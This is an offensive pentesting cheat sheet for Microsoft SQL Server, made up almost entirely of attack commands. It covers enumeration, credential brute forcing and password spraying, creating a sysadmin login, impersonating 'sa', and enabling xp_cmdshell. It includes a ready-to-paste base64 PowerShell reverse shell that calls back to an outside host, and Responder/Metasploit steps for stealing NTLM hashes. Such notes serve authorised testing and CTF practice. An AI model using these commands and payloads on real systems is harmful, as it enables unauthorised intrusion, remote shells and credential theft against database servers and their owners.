# MSSQL (Microsoft SQL) Pentesting

#### MSSQL is a relational database management system. A default port is 1433.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```shellscript
nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>

# MSDAT: https://github.com/quentinhardy/msdat
# all: Enumerate with all modules
python3 msdat.py all -s example.com
# -D, -U, -P: Use Windows authentication
python3 msdat.py all -s example.com -D domain -U username -P password
# xpdirectory: List directories in system
python3 msdat.py xpdirectory -s manager.htb -D manager -U operator -P operator -d master --list-files 'C:\'
# bulkopen: Read/download files
python3 msdat.py bulkopen -s example.com -D domain -U username -P password -d database --read-file 'C:\Users\Administrator\Desktop\example.txt'

# Metasploit
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
```

#### Brute Force Credentials <a href="#brute-force-credentials" id="brute-force-credentials"></a>

```shellscript
netexec mssql <target-ip> -u username -p passwords.txt

hydra -L usernames.txt –p password <target-ip> mssql
hydra -l username –P passwords.txt <target-ip> mssql
```

### Password Spraying Attack <a href="#password-spraying-attack" id="password-spraying-attack"></a>

If we found the specific user password, we might be able to find another user with the same password.

```
netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success
```

### Connect <a href="#connect" id="connect"></a>

```shellscript
# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database
```

### Commands <a href="#commands" id="commands"></a>

```shellscript
# Get the version of MSSQL
> SELECT @@version

# Get current username
> SELECT user_name()

# Get all users
> SELECT * FROM sys.database_principals

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# Switch to the database
> USE <database>

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>


# Check if the current user have permission to execute OS command
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# List directories
> xp_dirtree '.\'
> xp_dirtree 'C:\inetpub\'
> xp_dirtree 'C:\inetpub\wwwroot\'
> xp_dirtree 'C:\Users\'
```

#### Impersonate Other Users <a href="#impersonate-other-users" id="impersonate-other-users"></a>

Reference: [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#impersonation-of-other-users)

```shellscript
# Assume that the 'sa' user can be impersonated.
EXECUTE AS 'sa'
EXEC xp_cmdshell 'whoami'
```

### Spawn a Windows Command Shell and Run Commands using Impacket <a href="#spawn-a-windows-command-shell-and-run-commands-using-impacket" id="spawn-a-windows-command-shell-and-run-commands-using-impacket"></a>

In MSSQL client, we can exeucte the Windows Shell Commands by `enable_xp_cmdshell` if the user has the permission.

#### Enable/Disable a Windows Shell <a href="#enabledisable-a-windows-shell" id="enabledisable-a-windows-shell"></a>

```shellscript
> enable_xp_cmdshell

# or

# Enable advanced options
> EXEC sp_configure 'show advanced options', 1;
# Update the currently configured value for the advanced options
> RECONFIGURE;

# Enable the command shell
> EXEC sp_configure 'xp_cmdshell', 1;
# Update the currently configured value for the command shell
> RECONFIGURE;
```

#### Commands <a href="#commands_1" id="commands_1"></a>

We can execute commands the same as Windows Command Prompt.

```shellscript
> xp_cmdshell whoami

# Execute obfuscated PowerShel commands.
> xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'

# Reverse Shell
# Note: Replace the Base64 encoded payload with your own. See details: https://exploit-notes.hdks.org/exploit/shell/reverse-shell-cheat-sheet/#powershell
> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMAAuADAALgAxACcALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
```

### Privilege Escalation <a href="#privilege-escalation" id="privilege-escalation"></a>

```shellscript
msfconsole
msf> use exploit/windows/mssql/mssql_linkcrawler
```

### Get NTLM Hash <a href="#get-ntlm-hash" id="get-ntlm-hash"></a>

MSSQL uses **Keberos** to authenticate users so we can retrieve the NTLM hash.

#### 1. Start SMB Server and Responder <a href="#id-1-start-smb-server-and-responder" id="id-1-start-smb-server-and-responder"></a>

First we need to start a SMB server and Responder in each terminal.

```shellscript
# In terminal 1
sudo responder -I <interface>

# In terminal 2
sudo impacket-smbserver share ./ -smb2support

# In terminal 3
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
```

#### 2. Execute with Metasploit <a href="#id-2-execute-with-metasploit" id="id-2-execute-with-metasploit"></a>

In msfconsole, select the following module.\
We need to set the `SMBPROXY` option to the Responder IP (this ip is displayed when starting Responder in terminal).

```shellscript
msfconsole
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
msf> set rhosts <target_ip>
msf> set username <username>
msf> set password <password>
# If we use Windows credential, set as below:
msf> set use_windows_authent true
msf> set smbproxy <responder_ip>
msf> run
```

When executing, we can see the NTLM hash in the terminal where SMB server is running.

### References <a href="#references" id="references"></a>

* [HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server)
* [Microsoft Learn](https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16)